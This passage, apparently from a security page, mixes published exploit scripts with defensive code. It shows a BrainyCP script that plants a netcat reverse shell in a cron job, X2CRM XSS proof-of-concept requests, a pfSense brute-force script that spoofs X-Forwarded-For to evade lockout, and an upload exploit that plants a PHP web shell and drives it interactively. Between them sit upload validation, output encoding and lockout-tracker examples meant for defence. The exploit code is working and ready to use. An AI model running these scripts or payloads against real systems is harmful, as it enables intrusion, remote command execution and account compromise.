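# be the control on its own: the allow-list decides, the deny-list is a backstop.
ALLOWED_UPLOADS = {"bmp", "gif", "png", "jpg", "jpeg"}
FORBIDDEN_UPLOADS = {"zip", "js", "jsp", "php", "phtml", "php3", "pl", "sh", "py", "cgi",
                     "exe", "dll", "msi", "bat", "cmd", "htaccess"}


def extensions(name: str) -> list:
    """All extensions of the final path component, lower-cased, with trailing
    dots and spaces removed: 'A.jpg.ASPX.' -> ['jpg', 'aspx']."""
    base = posixpath.basename(name).lower().rstrip(". ")
    parts = base.split(".")
    return parts[1:] if len(parts) > 1 else []


def name_is_allowed(name: str) -> bool:
    """The last extension must be allow-listed and no extension may be deny-listed.
    Checking every extension also covers servers that dispatch on the first one."""
    exts = extensions(name)
    if not exts or any(e in FORBIDDEN_UPLOADS for e in exts):
        return False
    return exts[-1] in ALLOWED_UPLOADS


def resolve_inside_root(path: str) -> str:
    """Normalise a client-supplied path and refuse anything outside FILES_ROOT."""
    full = posixpath.normpath("/" + path.lstrip("/"))
    if full != FILES_ROOT and not full.startswith(FILES_ROOT + "/"):
        raise ValueError(f"{path!r} is outside {FILES_ROOT}")
    return full


def authorize_file_op(action: str, f: str, n: str) -> str:
    """Decide an UPLOAD / RENAMEFILE / MOVEFILE / COPYFILE request.
    f and n follow the main.ashx parameters (for UPLOAD, f is the target
    directory from the 'd' field and n the client file name).
    Returns 'ok' or 'denied: <reason>'. The destination name is validated
    for every action, not only for UPLOAD."""
    try:
        if action == "UPLOAD":
            dst = resolve_inside_root(posixpath.join(f, posixpath.basename(n)))
        elif action == "RENAMEFILE":
            if "/" in n:
                return "denied: rename may not change directory"
            dst = posixpath.join(posixpath.dirname(resolve_inside_root(f)), n)
        elif action in ("MOVEFILE", "COPYFILE"):
            resolve_inside_root(f)
            dst = resolve_inside_root(n)
        else:
            return f"denied: unknown action {action!r}"
    except ValueError as e:
        return f"denied: {e}"
    if not name_is_allowed(dst):
        return f"denied: {posixpath.basename(dst)!r} is not an allowed file type"
    return "ok"
```

The two requests from the walkthrough (rename test.jpg to test.aspx, move it to /Upload/NewFolder/test.aspx) are refused by the same `name_is_allowed` check that admitted the original upload, and case variants, double extensions and trailing dots are normalised before the lists are consulted. Serving the upload directory with script execution disabled is the complementary control this example does not show.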
<pre><code># Exploit Title: BrainyCP V1.0 - Remote Code Execution<br /># Date: 2023-04-03<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://brainycp.io<br /># Demo: https://demo.brainycp.io<br /># Tested on: Kali Linux<br /># CVE : N/A<br /><br />import requests<br /><br /># credentials<br />url = input("URL: ")<br />username = input("Username: ")<br />password = input("Password: ")<br />ip = input("IP: ")<br />port = input("Port: ")<br /><br /># login <br />session = requests.Session()<br />login_url = f"{url}/auth.php"<br />login_data = {"login": username, "password": password, "lan": "/"}<br />response = session.post(login_url, data=login_data)<br />if "Sign In" in response.text:<br /> print("[-] Wrong credentials or may the system patched.")<br /> exit()<br /><br /><br /># reverse shell <br />reverse_shell = f"nc {ip} {port} -e /bin/bash"<br /><br /># request<br />add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"<br />add_cron_data = {<br /> "cron_freq_minutes": "*",<br /> "cron_freq_minutes_own": "",<br /> "cron_freq_hours": "*",<br /> "cron_freq_hours_own": "",<br /> "cron_freq_days": "*",<br /> "cron_freq_days_own": "",<br /> "cron_freq_months": "*",<br /> "cron_freq_weekdays": "*",<br /> "cron_command": reverse_shell,<br /> "cron_user": username,<br />}<br />response = session.post(add_cron_url, data=add_cron_data)<br /><br />print("[+] Check your listener!")<br /> <br /><br /><br /></code></pre>
<pre><code># Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Exploit Author: Betul Denizler<br /># Vendor Homepage: https://x2crm.com/<br /># Software Link: https://sourceforge.net/projects/x2engine/<br /># Version: X2CRM v6.6/6.9<br /># Tested on: Ubuntu Mate 20.04<br /># Vulnerable Parameter: Actions[subject]<br /># CVE: CVE-2022-48178<br /># Date: 27.12.2022<br /><br />'''<br />POC REQUEST:<br />========<br />POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) <br />Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 172<br />Origin: http://localhost<br />Connection: close<br />Referer: <br />http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1<br />Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; <br />PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; <br />YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; <br />5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; <br />d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; <br />sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test<br /><br />EXPLOITATION<br />========<br />1. Create an action<br />2. 
Inject payload to the vulnerable parameter in POST request<br /><br />Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E<br />'''<br /><br /><br /><br /># Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)<br /># Exploit Author: Betul Denizler<br /># Vendor Homepage: https://x2crm.com/<br /># Software Link: https://sourceforge.net/projects/x2engine/<br /># Version: X2CRM v6.6/6.9<br /># Tested on: Ubuntu Mate 20.04<br /># Vulnerable Parameter: model<br /># CVE: Use CVE-2022-48177<br /># Date: 27.12.2022<br /><br />'''<br /><br />POC REQUEST:<br />========<br />GET <br />/x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E <br />HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) <br />Gecko/20100101 Firefox/108.0<br />Accept: <br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; <br />PHPSESSID=959fpkms4abdhtresce9k9rmk3; <br />YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; <br />d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; <br />locationTrackingFrequency=60; locationTrackingSwitch=1; <br />5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; <br />sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br /><br />EXPLOITATION<br />========<br />1. Select Import Records Model in admin settings<br />2. 
Inject payload to the vulnerable parameter in GET request<br /><br />Payload: "><body onload="alert(4)"><br />'''<br /> <br /><br /></code></pre>
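Both X2CRM findings above come down to output encoding: a stored value (Actions[subject]) and a reflected query parameter (model) are written into HTML without being encoded for the context they land in, so the `<script>` text node and the `"><body onload=...` attribute break-out render as markup. The example below is added for this page and is not X2CRM code; it shows the encoding applied at render time for text, attribute and URL contexts, plus an allow-list for the model parameter, which in this feature is a class name drawn from a fixed set rather than free text. The model names in the allow-list, the markup and the function names are assumptions.

```python
import html
from urllib.parse import urlencode

# Constructed allow-list of importable model names; X2CRM's real set is not on the page.
IMPORTABLE_MODELS = frozenset({"Accounts", "Contacts", "Actions", "Opportunity"})


def esc(value: str) -> str:
    """HTML-encode for element text and for double-quoted attribute values.
    quote=True turns " and ' into entities in addition to & < >."""
    return html.escape(str(value), quote=True)


def render_import_page(model: str) -> str:
    """Reflected case (admin/importModels?model=...). Validate against the
    allow-list first; the error branch still encodes the rejected value."""
    if model not in IMPORTABLE_MODELS:
        return f'<p class="error">Unknown model: {esc(model)}</p>'
    return (f'<form action="importModels" method="post">'
            f'<input type="hidden" name="model" value="{esc(model)}">'
            f'<button type="submit">Import {esc(model)}</button></form>')


def import_link(model: str) -> str:
    """URL context: URL-encode the parameter first, then HTML-encode the whole href."""
    return f'<a href="{esc("importModels?" + urlencode({"model": model}))}">Import</a>'


def render_action_row(subject: str, description: str) -> str:
    """Stored case (Actions[subject]). Encode at output time rather than at
    storage time, so the same stored value is safe in every HTML context."""
    return (f'<tr><td title="{esc(subject)}">{esc(subject)}</td>'
            f'<td>{esc(description)}</td></tr>')
```

Encoding at output time rather than on input is what keeps the stored case correct: the subject is still stored as typed, and every template that prints it (text cell, title attribute, link) applies the encoding its own context needs. The allow-list on model is a second, independent control for the reflected case; a Content-Security-Policy without `unsafe-inline` would limit what either payload could do even if an encoding were missed.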
<pre><code>#!/usr/bin/python3<br /><br />## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass<br />## Google Dork: intitle:"pfSense - Login"<br />## Date: 2023-04-07<br />## Exploit Author: FabDotNET (Fabien MAISONNETTE)<br />## Vendor Homepage: https://www.pfsense.org/<br />## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz<br />## Version: pfSenseCE <= 2.6.0<br />## CVE: CVE-2023-27100<br /><br /># Vulnerability<br />## CVE: CVE-2023-27100<br />## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100<br />## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc<br />## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66<br /><br />import requests<br />import sys<br />import re<br />import argparse<br />import textwrap<br />from urllib3.exceptions import InsecureRequestWarning<br /><br /># Expected Arguments<br />parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",<br /> formatter_class=argparse.RawTextHelpFormatter,<br /> epilog=textwrap.dedent(''' <br />Exploit Usage : <br />./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt<br />./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))<br /><br />parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")<br />parser.add_argument("-u", "--usersList", help="Username Dictionary")<br />parser.add_argument("-p", "--passwdList", help="Password Dictionary")<br />args = parser.parse_args()<br /><br />if len(sys.argv) < 2:<br /> print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")<br /> sys.exit(1)<br /><br /># Variable<br />url = args.url<br />usersList = args.usersList<br />passwdList = args.passwdList<br /><br /># Suppress only the single warning from urllib3 needed.<br />if 
url.upper().startswith("HTTPS://"):<br /> requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br /><br />print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')<br /><br /><br />def login(userlogin, userpasswd):<br /> session = requests.session()<br /> r = session.get(url, verify=False)<br /><br /> # Getting CSRF token value<br /> csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)<br /> csrftoken = csrftoken.group(1)<br /><br /> # Specifying Headers Value<br /> headerscontent = {<br /> 'User-Agent': 'Mozilla/5.0',<br /> 'Referer': f"{url}",<br /> 'X-Forwarded-For': '42.42.42.42'<br /> }<br /><br /> # POST REQ data<br /> postreqcontent = {<br /> '__csrf_magic': f"{csrftoken}",<br /> 'usernamefld': f"{userlogin}",<br /> 'passwordfld': f"{userpasswd}",<br /> 'login': 'Sign+In'<br /> }<br /><br /> # Sending POST REQ<br /> r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)<br /><br /> # Conditional loops<br /> if r.status_code != 200:<br /> print(f'[*] - Found Valid Credential !!')<br /> print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")<br /> sys.exit(0)<br /><br /><br /># Reading User.txt & Pass.txt files<br />userfile = open(usersList).readlines()<br />passfile = open(passwdList).readlines()<br /><br />for user in userfile:<br /> user = user.strip()<br /> for passwd in passfile:<br /> passwd = passwd.strip()<br /> login(user, passwd)<br /> <br /><br /></code></pre>
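The pfSense script above sends an X-Forwarded-For header with every login attempt while it iterates over the user and password lists. A lockout that charges failed attempts to an address taken from a client-controlled header, rather than to the TCP peer, can be made to count every attempt against a different, made-up source, which is the anti-brute-force bypass the advisory title names. The example below is added for this page and is not pfSense or sshguard code; it is a small failed-login tracker that keys on the peer address and consults X-Forwarded-For only when the peer is a configured reverse proxy. The class name, thresholds, proxy list and the sample addresses in the usage are assumptions (the 42.42.42.42 value is the one the script above sends).

```python
import ipaddress
from collections import defaultdict, deque
from typing import Deque, Dict, Iterable, Optional


class LoginGuard:
    """Per-source failed-login counter with a temporary lockout.

    The source identity is the TCP peer address. A client-supplied
    X-Forwarded-For header is consulted only when the peer itself is one of
    the configured reverse proxies, so a direct client cannot relabel itself."""

    def __init__(self, trusted_proxies: Iterable[str], max_failures: int = 5,
                 window_s: float = 600.0, ban_s: float = 1800.0) -> None:
        self.trusted = [ipaddress.ip_network(p, strict=False) for p in trusted_proxies]
        self.max_failures, self.window_s, self.ban_s = max_failures, window_s, ban_s
        self.failures: Dict[str, Deque[float]] = defaultdict(deque)
        self.banned_until: Dict[str, float] = {}

    def _is_trusted(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)  # raises ValueError on anything that is not an IP
        return any(addr in net for net in self.trusted)

    def client_key(self, peer_ip: str, xff: Optional[str]) -> str:
        """Address a failure is charged to. Walk X-Forwarded-For right to left,
        skipping trusted proxies, and take the first address a trusted proxy
        appended. Malformed headers fall back to the peer address."""
        if not xff or not self._is_trusted(peer_ip):
            return peer_ip
        for hop in reversed([h.strip() for h in xff.split(",") if h.strip()]):
            try:
                if not self._is_trusted(hop):
                    return hop
            except ValueError:
                return peer_ip
        return peer_ip

    def record_failure(self, peer_ip: str, xff: Optional[str], now: float) -> bool:
        """Log a failed attempt at time `now`; return True if the source is now locked out."""
        key = self.client_key(peer_ip, xff)
        recent = self.failures[key]
        while recent and now - recent[0] > self.window_s:
            recent.popleft()
        recent.append(now)
        if len(recent) >= self.max_failures:
            self.banned_until[key] = now + self.ban_s
            recent.clear()
            return True
        return False

    def is_blocked(self, peer_ip: str, xff: Optional[str], now: float) -> bool:
        """Check before processing a login form; expired bans are dropped on the way."""
        key = self.client_key(peer_ip, xff)
        until = self.banned_until.get(key)
        if until is not None and now < until:
            return True
        self.banned_until.pop(key, None)
        return False


def demo() -> bool:
    """Constructed run: a direct client rotating X-Forwarded-For still gets locked out."""
    guard = LoginGuard(trusted_proxies=["10.0.0.1"], max_failures=3)
    for i in range(3):
        guard.record_failure("203.0.113.7", f"42.42.42.{i}", now=100.0 + i)
    return guard.is_blocked("203.0.113.7", "42.42.42.42", now=105.0)
```

The same key is used for the log line that sshguard or fail2ban would read, so the entry that gets written names the address the connection actually came from. Trusting X-Forwarded-For is deliberately opt-in per proxy address, and only the right-most untrusted hop counts, because anything left of the hop your own proxy appended was written by the client.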
<pre><code>#!/usr/bin/env python3<br /><br /># Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)<br /># Date: 09/04/2023<br /># Exploit Author: Matisse Beckandt (Backendt)<br /># Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip<br /># Version: 1.0<br /># Tested on: Debian 11.6<br /># CVE : CVE-2023-1826<br /><br /># Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.<br />import requests<br />from argparse import ArgumentParser<br />from uuid import uuid4<br />from datetime import datetime, timezone<br /><br />def interactiveShell(fileUrl: str):<br /> print("Entering pseudo-shell. 
Type 'exit' to quit")<br /> while True:<br /> command = input("\n$ ")<br /> if command == "exit":<br /> break<br /><br /> response = requests.get(f"{fileUrl}?cmd={command}")<br /> print(response.text)<br /><br />def uploadFile(url: str, filename: str, content):<br /> endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"<br /> file = {"img": (filename, content)}<br /><br /> response = requests.post(endpoint, files=file)<br /> return response<br /><br />def getUploadedFileUrl(url: str, filename: str):<br /> timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes<br /> epoch = int(timeNow.timestamp()) # Time in milliseconds<br /> possibleFilename = f"{epoch}_(unknown)"<br /> fileUrl = f"{url}/uploads/{possibleFilename}"<br /> response = requests.get(fileUrl)<br /> if response.status_code == 200:<br /> return fileUrl<br /><br />def exploit(url: str):<br /> filename = str(uuid4()) + ".php"<br /> content = "<?php system($_GET['cmd'])?>"<br /> response = uploadFile(url, filename, content)<br /><br /> if response.status_code != 200:<br /> print(f"[File Upload] Got status code {response.status_code}. Expected 200.")<br /><br /> uploadedUrl = getUploadedFileUrl(url, filename)<br /> if uploadedUrl == None:<br /> print("Error. Could not find the uploaded file.")<br /> exit(1)<br /> print(f"Uploaded file is at {uploadedUrl}")<br /><br /> try:<br /> interactiveShell(uploadedUrl)<br /> except KeyboardInterrupt:<br /> pass<br /> print("\nQuitting.")<br /><br />def getWebsiteURL(url: str):<br /> if not url.startswith("http"):<br /> url = "http://" + url<br /> if url.endswith("/"):<br /> url = url[:-1]<br /> return url<br /><br />def main():<br /> parser = ArgumentParser(description="Exploit for CVE-2023-1826")<br /> parser.add_argument("url", type=str, help="The url to the application's installation. 
Example: http://mysite:8080/php-ocls/")<br /> args = parser.parse_args()<br /><br /> url = getWebsiteURL(args.url)<br /> exploit(url)<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>